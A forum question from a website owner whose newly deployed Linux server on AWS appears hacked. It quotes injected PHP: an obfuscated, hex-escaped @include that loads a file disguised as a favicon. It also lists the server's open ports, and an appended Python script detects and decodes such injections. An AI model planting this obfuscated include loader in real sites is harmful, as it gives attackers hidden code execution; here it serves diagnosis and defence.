1

I developed a new website, which I installed on a new server, and just two days ago I pointed the domain to that server.

However, strange things are happening now, such as index.html being renamed to index.html.bak.bak and an index.php appearing.

The following code is appearing in index.php, and in an existing index.php new code is being added, such as:

```php
<?php /*6e980*/

@include "\x2fh\x6fm\x65/\x732\x61n\x61l\x79t\x69c\x73/\x70u\x62l\x69c\x5fh\x74m\x6c/\x54A\x53c\x65n\x61r\x69o\x2fQ\x75e\x72y\x2ff\x61v\x69c\x6fn\x5fa\x365\x399\x65.\x69c\x6f";

/*6e980*/

echo file_get_contents('index.html.bak.bak');
```

Suddenly I observed that a folder named forum got created, with a lone PHP file called 5w4xg.php. jQuery files are becoming blank or contain weird headers.

It is a Linux server running on AWS. I think it's either been hacked or has malware.

I am advised to:

- Install SSL.
- Website can have SiteLock (https://www.sitelock.com/) for regular scans of website files and database.
- Website can have Comodo Web Application Firewall on the server, which will protect from SQL and XSS attacks.
- Install ClamAV antivirus for cPanel.

While someone is saying to install SSL, ClamAV and Wordfence.

I don't know what to do.

I also have the following ports open:
TCP 21 0.0.0.0/0
TCP 21 ::/0
TCP 22 0.0.0.0/0
TCP 25 0.0.0.0/0
TCP 25 ::/0
TCP 53 0.0.0.0/0
TCP 53 ::/0
TCP 80 0.0.0.0/0
TCP 80 ::/0
TCP 110 0.0.0.0/0
TCP 110 ::/0
TCP 143 0.0.0.0/0
TCP 143 ::/0
TCP 443 0.0.0.0/0
TCP 443 ::/0
TCP 465 0.0.0.0/0
TCP 465 ::/0
TCP 587 0.0.0.0/0
TCP 587 ::/0

I need ports only for: a) uploading files from my workplace, b) connecting to the MySQL db, c) the mail system to work.

Please advise what I can do, and something that involves minimal cost.

Greatchap
  • 111
  • 2
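
A defender-side check for the injection pattern shown in the question, as an added example that is not part of the original post: it finds a marker-wrapped `@include` with an escaped path in PHP files and decodes that path so the dropped file it points to can be located. The sample input, its marker and its path are constructed, and the function names are illustrative.

```python
import re
import sys
from pathlib import Path

# Marker comment, @include of a double-quoted string, then the same marker again.
INJECT_RE = re.compile(
    r'/\*(?P<tag>[0-9a-f]{4,8})\*/\s*@include\s+"(?P<path>(?:[^"\\]|\\.)+)"\s*;'
    r'\s*/\*(?P=tag)\*/', re.S)
# PHP double-quoted escapes: \xH or \xHH, and up to three octal digits.
ESCAPE_RE = re.compile(r'\\x([0-9a-fA-F]{1,2})|\\([0-7]{1,3})')

# Constructed sample in the shape of the injected block (not the poster's file).
SAMPLE = r'''<?php /*0a1b2*/

@include "\x2fvar\x2fwww/ex\x61mple/f\x61vicon_0.\x69co";

/*0a1b2*/

echo file_get_contents('index.html.bak.bak');
'''

def decode_php_string(s):
    """Resolve hex and octal escapes the way PHP does inside double quotes."""
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        return chr(int(m.group(2), 8) & 0xFF)
    return ESCAPE_RE.sub(repl, s)

def find_injections(source):
    """Return (marker, decoded include path) for each injected block."""
    return [(m.group('tag'), decode_php_string(m.group('path')))
            for m in INJECT_RE.finditer(source)]

def scan_tree(root):
    """Map each .php file under root to the injected blocks found in it."""
    hits = {}
    for php in sorted(Path(root).rglob('*.php')):
        found = find_injections(php.read_text(errors='replace'))
        if found:
            hits[str(php)] = found
    return hits

if __name__ == '__main__':
    # With a directory argument scan it; otherwise show the constructed sample.
    if len(sys.argv) > 1:
        for name, found in scan_tree(sys.argv[1]).items():
            for tag, target in found:
                print(f'{name}: marker {tag} includes {target}')
    else:
        print(find_injections(SAMPLE))
```

Each decoded path names a file that also has to be removed and examined, since the include executes it as PHP whatever its extension.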

0 Answers